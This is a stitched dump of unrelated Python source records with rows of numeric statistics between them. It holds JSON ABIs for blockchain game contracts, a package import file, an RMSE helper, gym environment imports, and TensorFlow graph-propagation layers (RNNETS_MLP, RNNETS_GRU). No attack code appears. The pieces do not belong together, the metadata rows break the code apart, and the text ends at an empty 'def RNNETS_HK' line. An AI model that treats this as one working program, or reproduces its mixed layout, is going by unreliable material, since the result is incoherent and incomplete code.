gold_abi = json.loads("""[{"anonymous":false,"inputs":[{"indexed":true,"internalType":"uint256","name":"from","type":"uint256"},{"indexed":true,"internalType":"uint256","name":"to","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"uint256","name":"from","type":"uint256"},{"indexed":true,"internalType":"uint256","name":"to","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"uint256","name":"","type":"uint256"},{"internalType":"uint256","name":"","type":"uint256"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"from","type":"uint256"},{"internalType":"uint256","name":"spender","type":"uint256"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"","type":"uint256"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"summoner","type":"uint256"}],"name":"claim","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"summoner","type":"uint256"}],"name":"claimable","outputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"","type":"uint256"}],"name":"claimed","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"
}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"from","type":"uint256"},{"internalType":"uint256","name":"to","type":"uint256"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"executor","type":"uint256"},{"internalType":"uint256","name":"from","type":"uint256"},{"internalType":"uint256","name":"to","type":"uint256"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"level","type":"uint256"}],"name":"wealth_by_level","outputs":[{"internalType":"uint256","name":"wealth","type":"uint256"}],"stateMutability":"pure","type":"function"}]""")
rm_abi = json.loads("""[{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"approved","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":false,"internalType":"bool","name":"approved","type":"bool"}],"name":"ApprovalForAll","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":false,"internalType":"uint256","name":"level","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"summoner","type":"uint256"}],"name":"leveled","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":false,"internalType":"uint256","name":"class","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"summoner","type":"uint256"}],"name":"summoned","type":"event"},{"inputs":[{"internalType":"uint256","name":"_summoner","type":"uint256"}],"name":"adventure","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"","type":"uint256"}],"name":"adventurers_log","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"approve","outputs":[],"stateMuta
bility":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"","type":"uint256"}],"name":"class","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"id","type":"uint256"}],"name":"classes","outputs":[{"internalType":"string","name":"description","type":"string"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"getApproved","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"operator","type":"address"}],"name":"isApprovedForAll","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"","type":"uint256"}],"name":"level","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_summoner","type":"uint256"}],"name":"level_up","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"next_summoner","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"ownerOf","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{
"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"bytes","name":"_data","type":"bytes"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"bool","name":"approved","type":"bool"}],"name":"setApprovalForAll","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_summoner","type":"uint256"},{"internalType":"uint256","name":"_xp","type":"uint256"}],"name":"spend_xp","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_class","type":"uint256"}],"name":"summon","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_summoner","type":"uint256"}],"name":"summoner","outputs":[{"internalType":"uint256","name":"_xp","type":"uint256"},{"internalType":"uint256","name":"_log","type":"uint256"},{"internalType":"uint256","name":"_class","type":"uint256"},{"internalType":"uint256","name":"_level","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_summoner","type":"uint256"}],"name":"tokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name"
:"tokenId","type":"uint256"}],"name":"transferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"","type":"uint256"}],"name":"xp","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"curent_level","type":"uint256"}],"name":"xp_required","outputs":[{"internalType":"uint256","name":"xp_to_next_level","type":"uint256"}],"stateMutability":"pure","type":"function"}]""")
cellar_abi = json.loads("""[{"anonymous":false,"inputs":[{"indexed":true,"internalType":"uint256","name":"from","type":"uint256"},{"indexed":true,"internalType":"uint256","name":"to","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"uint256","name":"from","type":"uint256"},{"indexed":true,"internalType":"uint256","name":"to","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"uint256","name":"_summoner","type":"uint256"}],"name":"adventure","outputs":[{"internalType":"uint256","name":"reward","type":"uint256"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"","type":"uint256"}],"name":"adventurers_log","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"","type":"uint256"},{"internalType":"uint256","name":"","type":"uint256"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"from","type":"uint256"},{"internalType":"uint256","name":"spender","type":"uint256"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_dex","type":"uint256"}],"name":"armor_class","outputs":[{"internalType":"int256","name":"","type":"int256"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"uint256","name":"_class","type":"uint256"},{"internalType":"uint256","name":"_str","type":"uint256"},{"internalType":"uint256","name":"_level","type":"uint256"}],"name":"attack_bonus","outputs"
:[{"internalType":"int256","name":"","type":"int256"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"uint256","name":"","type":"uint256"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_class","type":"uint256"}],"name":"base_attack_bonus_by_class","outputs":[{"internalType":"uint256","name":"attack","type":"uint256"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"uint256","name":"_class","type":"uint256"},{"internalType":"uint256","name":"_level","type":"uint256"}],"name":"base_attack_bonus_by_class_and_level","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"uint256","name":"_str","type":"uint256"}],"name":"damage","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"dungeon_armor_class","outputs":[{"internalType":"int256","name":"","type":"int256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"dungeon_damage","outputs":[{"internalType":"int256","name":"","type":"int256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"dungeon_health","outputs":[{"internalType":"int256","name":"","type":"int256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"dungeon_to_hit","outputs":[{"internalType":"int256","name":"","type":"int256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_class","type":"uint256"}],"name":"health_by_class","outputs":[{"internalType":"uint256","name":"health","type":"uint256"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"uint256","name":"_class","type":"ui
nt256"},{"internalType":"uint256","name":"_level","type":"uint256"},{"internalType":"uint32","name":"_const","type":"uint32"}],"name":"health_by_class_and_level","outputs":[{"internalType":"uint256","name":"health","type":"uint256"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"uint256","name":"_attribute","type":"uint256"}],"name":"modifier_for_attribute","outputs":[{"internalType":"int256","name":"_modifier","type":"int256"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_summoner","type":"uint256"}],"name":"scout","outputs":[{"internalType":"uint256","name":"reward","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"int256","name":"_attack_bonus","type":"int256"}],"name":"to_hit_ac","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"from","type":"uint256"},{"internalType":"uint256","name":"to","type":"uint256"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"executor","type":"uint256"},{"internalType":"uint256","name":"from","type":"uint256"},{"internalType":"uint256","name":"to","type":"uint256"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable",
"type":"function"}]""")
attr_abi = json.loads("""[{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"creator","type":"address"},{"indexed":false,"internalType":"uint256","name":"summoner","type":"uint256"},{"indexed":false,"internalType":"uint32","name":"strength","type":"uint32"},{"indexed":false,"internalType":"uint32","name":"dexterity","type":"uint32"},{"indexed":false,"internalType":"uint32","name":"constitution","type":"uint32"},{"indexed":false,"internalType":"uint32","name":"intelligence","type":"uint32"},{"indexed":false,"internalType":"uint32","name":"wisdom","type":"uint32"},{"indexed":false,"internalType":"uint32","name":"charisma","type":"uint32"}],"name":"Created","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"leveler","type":"address"},{"indexed":false,"internalType":"uint256","name":"summoner","type":"uint256"},{"indexed":false,"internalType":"uint32","name":"strength","type":"uint32"},{"indexed":false,"internalType":"uint32","name":"dexterity","type":"uint32"},{"indexed":false,"internalType":"uint32","name":"constitution","type":"uint32"},{"indexed":false,"internalType":"uint32","name":"intelligence","type":"uint32"},{"indexed":false,"internalType":"uint32","name":"wisdom","type":"uint32"},{"indexed":false,"internalType":"uint32","name":"charisma","type":"uint32"}],"name":"Leveled","type":"event"},{"inputs":[{"internalType":"uint256","name":"current_level","type":"uint256"}],"name":"abilities_by_level","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"uint256","name":"","type":"uint256"}],"name":"ability_scores","outputs":[{"internalType":"uint32","name":"strength","type":"uint32"},{"internalType":"uint32","name":"dexterity","type":"uint32"},{"internalType":"uint32","name":"constitution","type":"uint32"},{"internalType":"uint32","name":"intelligence","type":"uint32"},{"internalType":"uint32","name":"wisdom","type"
:"uint32"},{"internalType":"uint32","name":"charisma","type":"uint32"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"score","type":"uint256"}],"name":"calc","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"uint256","name":"_str","type":"uint256"},{"internalType":"uint256","name":"_dex","type":"uint256"},{"internalType":"uint256","name":"_const","type":"uint256"},{"internalType":"uint256","name":"_int","type":"uint256"},{"internalType":"uint256","name":"_wis","type":"uint256"},{"internalType":"uint256","name":"_cha","type":"uint256"}],"name":"calculate_point_buy","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"uint256","name":"","type":"uint256"}],"name":"character_created","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_summoner","type":"uint256"}],"name":"increase_charisma","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_summoner","type":"uint256"}],"name":"increase_constitution","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_summoner","type":"uint256"}],"name":"increase_dexterity","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_summoner","type":"uint256"}],"name":"increase_intelligence","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_summoner","type":"uint256"}],"name":"increase_strength","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_summoner","type":"uint256"}],"name":"increase_wisdom","outputs":[],"stateMutability":"nonpayable","type":"funct
ion"},{"inputs":[{"internalType":"uint256","name":"","type":"uint256"}],"name":"level_points_spent","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_summoner","type":"uint256"},{"internalType":"uint32","name":"_str","type":"uint32"},{"internalType":"uint32","name":"_dex","type":"uint32"},{"internalType":"uint32","name":"_const","type":"uint32"},{"internalType":"uint32","name":"_int","type":"uint32"},{"internalType":"uint32","name":"_wis","type":"uint32"},{"internalType":"uint32","name":"_cha","type":"uint32"}],"name":"point_buy","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_summoner","type":"uint256"}],"name":"tokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"}]""")
| 3,475.666667
| 6,532
| 0.660737
| 2,068
| 20,854
| 6.609768
| 0.059478
| 0.158534
| 0.227156
| 0.125101
| 0.940669
| 0.912283
| 0.855512
| 0.838613
| 0.822738
| 0.805106
| 0
| 0.046161
| 0.000671
| 20,854
| 6
| 6,533
| 3,475.666667
| 0.609741
| 0
| 0
| 0
| 0
| 0.8
| 0.993623
| 0.993623
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.2
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 13
|
684db5f76eab70d232cc307e0b995a49cd636d1a
| 167
|
py
|
Python
|
camps/__init__.py
|
AdamSchnapp/mycamps
|
c5c158fdcdc41890c06598bf7c2329b1b981f259
|
[
"MIT"
] | null | null | null |
camps/__init__.py
|
AdamSchnapp/mycamps
|
c5c158fdcdc41890c06598bf7c2329b1b981f259
|
[
"MIT"
] | null | null | null |
camps/__init__.py
|
AdamSchnapp/mycamps
|
c5c158fdcdc41890c06598bf7c2329b1b981f259
|
[
"MIT"
] | null | null | null |
#from .variables import Variable
from .steps import MultiStep
from .variables import Variable
from .sfctbl import read_sfctbl
import camps.core
import camps.stations
| 20.875
| 32
| 0.832335
| 23
| 167
| 6
| 0.478261
| 0.188406
| 0.275362
| 0.391304
| 0.449275
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125749
| 167
| 7
| 33
| 23.857143
| 0.945205
| 0.185629
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
685146ad3e081058e765cae883a2f262eb9e5688
| 136
|
py
|
Python
|
readability_baseline/evaluation/loss.py
|
SharvilN/Common-Readability-Prize
|
c92f8b3456610a092027fb1a287541cbecab410b
|
[
"MIT"
] | null | null | null |
readability_baseline/evaluation/loss.py
|
SharvilN/Common-Readability-Prize
|
c92f8b3456610a092027fb1a287541cbecab410b
|
[
"MIT"
] | null | null | null |
readability_baseline/evaluation/loss.py
|
SharvilN/Common-Readability-Prize
|
c92f8b3456610a092027fb1a287541cbecab410b
|
[
"MIT"
] | null | null | null |
import numpy as np
from sklearn import metrics
def rmse(targets, preds):
    """Root-mean-squared error between ``targets`` and ``preds``.

    Parameters
    ----------
    targets : array-like of float
        Ground-truth values.
    preds : array-like of float
        Predicted values; must have the same shape as ``targets``.

    Returns
    -------
    numpy.float64
        ``sqrt(mean((targets - preds) ** 2))``.

    Raises
    ------
    ValueError
        If the two inputs do not have the same shape (sklearn's
        ``mean_squared_error`` raised ValueError for this case too).
    """
    t = np.asarray(targets, dtype=float)
    p = np.asarray(preds, dtype=float)
    if t.shape != p.shape:
        raise ValueError(f"shape mismatch: targets {t.shape} vs preds {p.shape}")
    # Computed directly with numpy: for its default arguments,
    # sklearn.metrics.mean_squared_error(t, p) is exactly mean((t - p) ** 2),
    # so this is numerically identical while avoiding the sklearn round-trip.
    return np.sqrt(np.mean((t - p) ** 2))
| 27.2
| 62
| 0.786765
| 21
| 136
| 5
| 0.761905
| 0.228571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.132353
| 136
| 5
| 62
| 27.2
| 0.889831
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
689678a5e2a4928b1c314274dfea106c5d922f0e
| 243
|
py
|
Python
|
gym_promotions/envs/__init__.py
|
kimfalk/gym-promotions
|
0d8ca25e91ef7fc2039b00daffa94241696604a0
|
[
"MIT"
] | null | null | null |
gym_promotions/envs/__init__.py
|
kimfalk/gym-promotions
|
0d8ca25e91ef7fc2039b00daffa94241696604a0
|
[
"MIT"
] | null | null | null |
gym_promotions/envs/__init__.py
|
kimfalk/gym-promotions
|
0d8ca25e91ef7fc2039b00daffa94241696604a0
|
[
"MIT"
] | null | null | null |
from gym_promotions.envs.promotions_env import PromotionsEnv
from gym_promotions.envs.promotions_probabilistic_env import PromotionsProbabilisticEnv
from gym_promotions.envs.promotions_from_space_env import PromotionsProbabilisticFromSpaceEnv
| 60.75
| 93
| 0.925926
| 27
| 243
| 8
| 0.407407
| 0.097222
| 0.236111
| 0.291667
| 0.430556
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.049383
| 243
| 3
| 94
| 81
| 0.935065
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d7b6c1519e12fe4c540fbece0e2fa81a8ad29375
| 7,008
|
py
|
Python
|
RN-Nets_for_vertex_classification/utils/layers.py
|
yeweiysh/RN-Nets
|
4afa180e6a745291f08790b923ae4ef308616c6f
|
[
"MIT"
] | null | null | null |
RN-Nets_for_vertex_classification/utils/layers.py
|
yeweiysh/RN-Nets
|
4afa180e6a745291f08790b923ae4ef308616c6f
|
[
"MIT"
] | null | null | null |
RN-Nets_for_vertex_classification/utils/layers.py
|
yeweiysh/RN-Nets
|
4afa180e6a745291f08790b923ae4ef308616c6f
|
[
"MIT"
] | null | null | null |
import numpy as np
import tensorflow.compat.v1 as tf
tf.disable_v2_behavior()
import sys
conv1d = tf.layers.conv1d
def RNNETS_MLP(inputs, output_dim, norm_mat, activation, in_drop=0.0):
    """RN-Nets layer: multi-hop propagation mixed by a width-1-conv MLP.

    Pipeline (all TF1 graph ops): project `inputs` to `output_dim` features
    with a width-1 conv, propagate the result 20 times through the sparse
    operator `norm_mat`, stack all 20 hop representations, and learn a
    weighting over the hop axis with two width-1 conv layers (32 hidden
    units, then 1). A trainable bias is added and `activation` applied.

    Args:
        inputs: 2-D tensor of per-node features — presumably
            (num_nodes, in_dim); it is wrapped in a batch of 1 before the
            conv1d. TODO confirm against caller.
        output_dim: per-node output feature dimension.
        norm_mat: SparseTensor used for propagation — presumably a
            normalized (num_nodes, num_nodes) adjacency; verify at call site.
        activation: callable applied to the biased result before returning.
        in_drop: input/feature dropout probability; 0.0 disables dropout.

    Returns:
        activation(...) of a tensor shaped (1, num_nodes, output_dim).
    """
    with tf.name_scope('my_attn'):
        if in_drop != 0.0:
            inputs = tf.nn.dropout(inputs, 1.0 - in_drop)
        # conv1d expects a batch dimension; add one, convolve, drop it again.
        inputs = tf.expand_dims(inputs, axis=0)
        seq_fts = tf.layers.conv1d(inputs, output_dim, 1, use_bias=False)
        if in_drop != 0.0:
            seq_fts = tf.nn.dropout(seq_fts, 1.0 - in_drop)
        hops = 20  # number of propagation steps through norm_mat
        seq_fts = tf.squeeze(seq_fts, axis=0)
        # n must be a static (graph-build-time) node count for the reshapes below.
        n, m = seq_fts.get_shape()
        n = int(n)
        # subspace[i] = norm_mat^(i+1) @ seq_fts — one entry per hop.
        H1 = tf.sparse_tensor_dense_matmul(norm_mat, seq_fts)
        subspace = list()
        subspace.append(H1)
        for i in range(hops-1):
            Hi = tf.sparse_tensor_dense_matmul(norm_mat, subspace[i])
            subspace.append(Hi)
        # Aggregation: flatten each hop to a row, then treat the hop axis as
        # the conv1d channel axis so the two convs act as an MLP over hops.
        H = tf.stack(subspace, axis=0)
        H = tf.reshape(H, [hops, n*output_dim])
        H = tf.transpose(H)
        H = tf.expand_dims(H, axis=0)
        H = tf.layers.conv1d(H, 32, 1, use_bias=False, activation="relu")
        H = tf.layers.conv1d(H, 1, 1, use_bias=False)
        H = tf.transpose(H)
        vals = tf.reshape(H, [1, n, output_dim])
        # tf.contrib was removed in TF 2.x, so the bias is added manually
        # instead of via tf.contrib.layers.bias_add(vals).
        bias = tf.get_variable(shape=[output_dim,],initializer=tf.initializers.zeros,name="bias0")
        ret = tf.nn.bias_add(vals,bias)
        return activation(ret)  # final nonlinearity supplied by the caller
def RNNETS_GRU(inputs, output_dim, norm_mat, activation, in_drop=0.0):
    """RN-Nets layer: multi-hop propagation mixed by a GRU.

    Same propagation front end as RNNETS_MLP (width-1 conv projection, then
    20 hops through `norm_mat`), but the stacked hop representations are
    consumed by a GRU instead of a conv MLP: H is reshaped to
    (n, output_dim, hops) and fed to tf.nn.dynamic_rnn, which therefore
    scans over the output_dim axis with a `hops`-long feature vector per
    step; the hidden dimension of the GRU outputs is then max-pooled away.

    Args:
        inputs: 2-D tensor of per-node features — presumably
            (num_nodes, in_dim). TODO confirm against caller.
        output_dim: per-node output feature dimension.
        norm_mat: SparseTensor used for propagation — presumably a
            normalized (num_nodes, num_nodes) adjacency; verify at call site.
        activation: callable applied to the biased result before returning.
        in_drop: input/feature dropout probability; 0.0 disables dropout.

    Returns:
        activation(...) of a tensor shaped (1, num_nodes, output_dim).
    """
    with tf.name_scope('my_attn'):
        if in_drop != 0.0:
            inputs = tf.nn.dropout(inputs, 1.0 - in_drop)
        # conv1d expects a batch dimension; add one, convolve, drop it again.
        inputs = tf.expand_dims(inputs, axis=0)
        seq_fts = tf.layers.conv1d(inputs, output_dim, 1, use_bias=False)
        if in_drop != 0.0:
            seq_fts = tf.nn.dropout(seq_fts, 1.0 - in_drop)
        hops = 20    # number of propagation steps through norm_mat
        hidden = 32  # GRU hidden-state size
        seq_fts = tf.squeeze(seq_fts, axis=0)
        # n must be a static (graph-build-time) node count for the reshapes below.
        n, m = seq_fts.get_shape()
        n = int(n)
        # subspace[i] = norm_mat^(i+1) @ seq_fts — one entry per hop.
        H1 = tf.sparse_tensor_dense_matmul(norm_mat, seq_fts)
        subspace = list()
        subspace.append(H1)
        for i in range(hops-1):
            Hi = tf.sparse_tensor_dense_matmul(norm_mat, subspace[i])
            subspace.append(Hi)
        # Aggregation: rearrange so each (node, feature) position carries its
        # hops-long history, then let a GRU digest it.
        H = tf.stack(subspace, axis=0)
        H = tf.reshape(H, [hops, n*output_dim])
        H = tf.transpose(H)
        H = tf.reshape(H, [n, output_dim, hops])
        rnn_hidden_size = hidden
        cell = tf.nn.rnn_cell.GRUCell(num_units=rnn_hidden_size)
        # dynamic_rnn (batch-major): batch=n, time=output_dim, features=hops.
        outputs, last_states = tf.nn.dynamic_rnn(cell, H, dtype=tf.float32)
        # Max-pool over the GRU hidden dimension -> (n, output_dim).
        vals = tf.reduce_max(outputs, axis=-1)
        vals = tf.expand_dims(vals, axis=0)
        # tf.contrib was removed in TF 2.x, so the bias is added manually
        # instead of via tf.contrib.layers.bias_add(vals).
        bias = tf.get_variable(shape=[output_dim,],initializer=tf.initializers.zeros,name="bias")
        ret = tf.nn.bias_add(vals,bias)
        return activation(ret)  # final nonlinearity supplied by the caller
def RNNETS_HK(inputs, output_dim, norm_mat, activation, in_drop=0.0):
